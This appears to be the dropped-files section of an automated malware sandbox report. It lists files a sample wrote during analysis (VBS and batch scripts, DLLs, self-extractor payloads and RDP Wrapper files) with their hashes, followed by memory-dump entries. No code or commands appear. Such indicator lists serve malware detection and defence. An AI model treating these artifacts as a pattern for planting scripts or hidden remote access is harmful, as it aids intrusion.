c24ce1f5a479e3c57899a4a35a0eaf1df33023de28a6d36435187a1b34078cddac8bddf8ab07ced5de02a72462ec9b984d22aab9f2731cebda6bad875794d9cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\hyr

Filesize
439KB

MD5
5c0c0dee805dfce8baa8cc55b1283052

SHA1
a51faaa602d8581831b890b0f37f668d28a0eb1c

SHA256
809e04ceb93c59c55c1905bcb1af8c1bbf8ccd991696228d551b1ab131c97fb0

SHA512
de9e6964bc88f741758762da3ede034a0cba66711d0f615051e0ed4599ed02e303148cde60c6071234665e59b8b6b6b223bad019f688442ee8455aa424b22cd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\kij

Filesize
565KB

MD5
8338b1fc8a15e649fe9867d0bc7cecd2

SHA1
1fedd0a100549c0ba9940a1c2ac5c1ddb3cfa5eb

SHA256
10105dabb0273dc7fbd6c167178bf357906799dcec9575694c2bd182c36a853e

SHA512
2f6a0f0479206ad34a3f73c3273312090f04dba8e32fb6de1b534e8ee2405cbf1218df9e25d741b21ce6625f7513245799d37e78d4d50eb859c24b457ea17cd6

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\oxlwi.com

Filesize
393KB

MD5
c30c9064c4a069bb7d541c1e0af39f09

SHA1
6bb38b4f16bfe4aa2df5403a089d9bae588a573c

SHA256
ef89574c3f80dadd4568b34c9fa1b7bad12d0f84dc1fb711fcc5fcea3358a80c

SHA512
b06fa26d7cf6d774ee14897b81aec72ceaff6355db41086351ecd7f65bd0d3b9817984f7177cfb9f06b2c07083e470ccf4a3027f90d443556e699311a738db6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rusk.com

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\sfera.com

Filesize
604KB

MD5
4517e5b8c4bd8902c3d6a9b9e654ae61

SHA1
feebcecb0b44144051df388755df2a58c5c79690

SHA256
15fab1634ae1cef6e6acd45553c6c11da455c8850ceebe08cb134473b260948e

SHA512
8cdeed1f9cefb0f047ff63217ae3de48d028066f88574f8168e35f1c0080524a061dff5fd85414fea27ffd68dfa24e2557c68552a6fe9b6b96dfd9d47e4fe6c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\utru.com

Filesize
626KB

MD5
b9314534cee284ef03329d7c4d899e72

SHA1
15583a208381887431e4958086718bd14a5c294b

SHA256
1f6ac542b5fcc85b43cd0ca42af65608c8767e05cebe1543d9359ed73a4b93cf

SHA512
92ad8eda697da85103663f6100bc04b167bb9ad3908ed654ab48ae3876efa328716df18a28e1e904566ce59c588a1891cb3f7b4ce272fca5352d0e4e06a8d0e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\vobo.com

Filesize
777KB

MD5
cdb9ce9e2256e661a398d1d5bb76273e

SHA1
886719e3c6de7d8fc9a004c8ee5cad23d6e024b0

SHA256
5838a870c965da74c91c5990020dc64ec51fa03cd41fc8dd869d006520b9b3c9

SHA512
5c132785825a2ac2aa9cda7f61e20c5159ee31cc3c066910c433db99be3cb35e08a79134e4866d80950ebf947c74cfd920524634583b0cb8005d36d5aacc48ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\VBJB.vbs

Filesize
2KB

MD5
193242114c1738d0ea04aa93659fdd5a

SHA1
a929cc1cfbe44ba8a99117dfd7819776ab45d465

SHA256
c879379224bc8dc4a4f495f989711714a936892b11e7a1cf6e7b79654dc8f928

SHA512
46825c3cc42c3c2e86a3890b29b3a2cf9b30e892d0d38bfb2e3334ffa3951b8f732b2786bdffa528ee6ff05c789c35e963f069d54680c3e16735165072e6fec4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kpfujqmo.rhv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\fvnW.vbs

Filesize
2KB

MD5
e2412243518e6670139e6a1ab6f86a11

SHA1
b5b55e61279bfea17414d17af75dd6800ffb97c6

SHA256
ddf634c6f7197af3255caf94af3c986ed7348e7efd508274075cb36254fc8762

SHA512
3d0289054ea2355d923da7f6cda0f52015808d73c73910a7145efff80636788dc99c12382ed5f6d25dc299a5be0222deed46a8018c83c6c2852072e4af6e62c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\kECQEKom.bat

Filesize
1KB

MD5
9f4814b54330a6d39710efee034ff3d0

SHA1
b63d9070014227f712fa9f3b474563f28bdab3d2

SHA256
2db28578484c81407892d071e03d3e5d8a11402bf4ea82a3c3607f14d30685d9

SHA512
0c50a30af8c4f9ea78f71fa980a76e33d4c8512bd07e9ab2129058ebd0bca70f99781a05d5ae5336a5bf24ba5f57761b24a55e100bc206bbc21bf861032b3037

Download Submit
C:\Users\Admin\AppData\Local\Temp\mTVPm.vbs

Filesize
4KB

MD5
52cab7d0956dde8857cad982d0ee203c

SHA1
8467f9c1ca03ffe724d09275251e478d09ff4457

SHA256
dc7723a782bab621f18684b9654eabd859a13d9812a93813d9a15be97e673f9d

SHA512
b14e9e05ae06c7173fea2eb581cb041b3af21214986d36910a55e0c5545069ffa7310c47e13e50537796fcf7064d1d81e12fb248e09ba494f217172466171fdb

Download Submit
C:\Users\Admin\AppData\Local\Temp\phO.dll

Filesize
933B

MD5
bf2762470699c2db8d520d111f8633ba

SHA1
eb39fb548715b503f36a12c53c7cf773cab071ef

SHA256
30726c3b89a2f0f3898639c2b5a8c2f7ff0550f5dbdb8617f3b9b1779fb8ff15

SHA512
0726d51e5018f62113d0e1c21dda23b72e4464c2a927d863b487baf91a80df36ec3d0793b458d85db48b6db0cf3b0a5cbe2bb9331960bcb99e85a2caf0d7adf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\phO.dll

Filesize
926B

MD5
f856d34d7ae9ca4d07c06c976c0a2c4c

SHA1
473f546b45db1b83f4f98c6e64ea08d6fe89fc04

SHA256
9f9c14c4d557b03e2d7aa6538da91bce0b1996da9f6ee237f748b3f4e1f72f90

SHA512
1c1a3d4b2cedb4efcbf6852f1eb8cf414f3b1e2cb3fa88195bb45dc8d42bc19b219e52cdfcf2a888081a2d35f0fcd6fbda32c9b3a04352822cb7f887dd1cfc56

Download Submit
C:\Users\Admin\AppData\Roaming\eUSvoNBwxD.bat

Filesize
1KB

MD5
fd5bdb9de205580a5b1cbbee5a115c93

SHA1
aca041af337daea9a28292a0bc47ddf65de924a0

SHA256
0ba027251fdc179b19f9dafb9514da691256f22468764d33c6c275e3e2f8580f

SHA512
0ea8e2d6d7e1a5ff567070ae1173197bbd8ee6fd131e5d5492b9763769995843833fc08c433de5c0018bae626fd4e082e2640610c5c1d8e00163bc5f5bcc711d

Download Submit
C:\Windows\System32\null

Filesize
1KB

MD5
4739ecf198580c7bf6762b6c374c15a3

SHA1
1a95c58c7c05a8bd8deff00765c1ca596a65e0ce

SHA256
cf01a88143a81d6c3d5916a005fd17815172ab5362d2acaa64fafa47fcf83524

SHA512
0b2456b39aa6ee2d7e871e814eac61b18f09a33dbe9210e483a510bfda41dc470da9a69fb450e9312ed069325d2f1fd6da5c9ca93a937e0dd44584b4e828ef3b

Download Submit
C:\Windows\System32\null

Filesize
1KB

MD5
88d847533f5a009adf9aa0a524b808ad

SHA1
ce1469aa9f566aac1718e9ba1c1fcf9f54e907c6

SHA256
cfb7276ed432da4bfed18dbfc1b7ffd8945b46a99fbcb8c1fefff048685019c2

SHA512
380b092bec2dd5746117bf6d8dc56a9c32e936bbf1e643262ad162a0d585fdcc57cb260304a6f5fece978cab0e2239f234e455ead907df07b3c714c2b70ee23a

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.dll

Filesize
114KB

MD5
461ade40b800ae80a40985594e1ac236

SHA1
b3892eef846c044a2b0785d54a432b3e93a968c8

SHA256
798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

SHA512
421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.ini

Filesize
188KB

MD5
234237e237aecf593574caf95b1432a2

SHA1
9b925bd5b9d403e90924f613d1d16ecf12066b69

SHA256
d9bb5a5359b3ff1865722b6fbf089f0165c5ce95d1ed9aea624ba57866781ceb

SHA512
b0cc341b68692899887a5750d937a8693f1063187f6341b7ac23512216f38381853309fd01440bd869d8816d5fded56486578f0e1169124ffe06ac92ad6723a0

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.ini

Filesize
128KB

MD5
dddd741ab677bdac8dcd4fa0dda05da2

SHA1
69d328c70046029a1866fd440c3e4a63563200f9

SHA256
7d5655d5ec4defc2051aa5f582fac1031b142040c8eea840ff88887fe27b7668

SHA512
6106252c718f7ca0486070c6f6c476bd47e6ae6a799cffd3fb437a5ce2b2a904e9cbe17342351353c594d7a8ae0ef0327752ff977dee1e69f0be7dc8e55cf4ec

Download Submit
memory/1076-61-0x0000000012CA0000-0x0000000012E94000-memory.dmp

Filesize
2.0MB

Download
memory/1076-59-0x0000000012CA0000-0x0000000012E94000-memory.dmp

Filesize
2.0MB

Download
memory/1280-174-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/1660-45-0x0000000000490000-0x00000000004F7000-memory.dmp

Filesize
412KB

Download
memory/1660-46-0x0000000000490000-0x00000000004F7000-memory.dmp

Filesize
412KB

Download
memory/1660-43-0x0000000000490000-0x00000000004F7000-memory.dmp

Filesize
412KB

Download
memory/1660-55-0x0000000000490000-0x00000000004F7000-memory.dmp

Filesize
412KB

Download
memory/1864-150-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/2760-123-0x0000000006C40000-0x0000000006C5E000-memory.dmp

Filesize
120KB

Download
memory/2760-113-0x0000000075270000-0x00000000752BC000-memory.dmp

Filesize
304KB

Download
memory/2760-130-0x0000000007BE0000-0x0000000007BEE000-memory.dmp

Filesize
56KB

Download
memory/2760-131-0x0000000007BF0000-0x0000000007C04000-memory.dmp

Filesize
80KB

Download
memory/2760-132-0x0000000007CE0000-0x0000000007CFA000-memory.dmp

Filesize
104KB

Download
memory/2760-133-0x0000000007CC0000-0x0000000007CC8000-memory.dmp

Filesize
32KB

Download
memory/2760-128-0x0000000007C20000-0x0000000007CB6000-memory.dmp

Filesize
600KB

Download
memory/2760-127-0x0000000007A20000-0x0000000007A2A000-memory.dmp

Filesize
40KB

Download
memory/2760-126-0x00000000079A0000-0x00000000079BA000-memory.dmp

Filesize
104KB

Download
memory/2760-125-0x0000000008050000-0x00000000086CA000-memory.dmp

Filesize
6.5MB

Download
memory/2760-124-0x00000000078B0000-0x0000000007953000-memory.dmp

Filesize
652KB

Download
memory/2760-95-0x00000000051B0000-0x00000000051E6000-memory.dmp

Filesize
216KB

Download
memory/2760-96-0x00000000058E0000-0x0000000005F08000-memory.dmp

Filesize
6.2MB

Download
memory/2760-129-0x0000000007BC0000-0x0000000007BD1000-memory.dmp

Filesize
68KB

Download
memory/2760-112-0x0000000007870000-0x00000000078A2000-memory.dmp

Filesize
200KB

Download
memory/2760-111-0x00000000066B0000-0x00000000066FC000-memory.dmp

Filesize
304KB

Download
memory/2760-110-0x0000000006690000-0x00000000066AE000-memory.dmp

Filesize
120KB

Download
memory/2760-109-0x0000000006160000-0x00000000064B4000-memory.dmp

Filesize
3.3MB

Download
memory/2760-97-0x0000000005830000-0x0000000005852000-memory.dmp

Filesize
136KB

Download
memory/2760-99-0x00000000060F0000-0x0000000006156000-memory.dmp

Filesize
408KB

Download
memory/2760-98-0x0000000006080000-0x00000000060E6000-memory.dmp

Filesize
408KB

Download
memory/3576-40-0x0000000012EC0000-0x0000000012EE7000-memory.dmp

Filesize
156KB

Download
memory/3576-39-0x00000000008E0000-0x0000000000900000-memory.dmp

Filesize
128KB

Download
memory/3576-37-0x00000000008E0000-0x0000000000900000-memory.dmp

Filesize
128KB

Download
memory/3840-205-0x0000020168CB0000-0x0000020168CD2000-memory.dmp

Filesize
136KB

Download
memory/4308-181-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/4352-164-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/4620-162-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download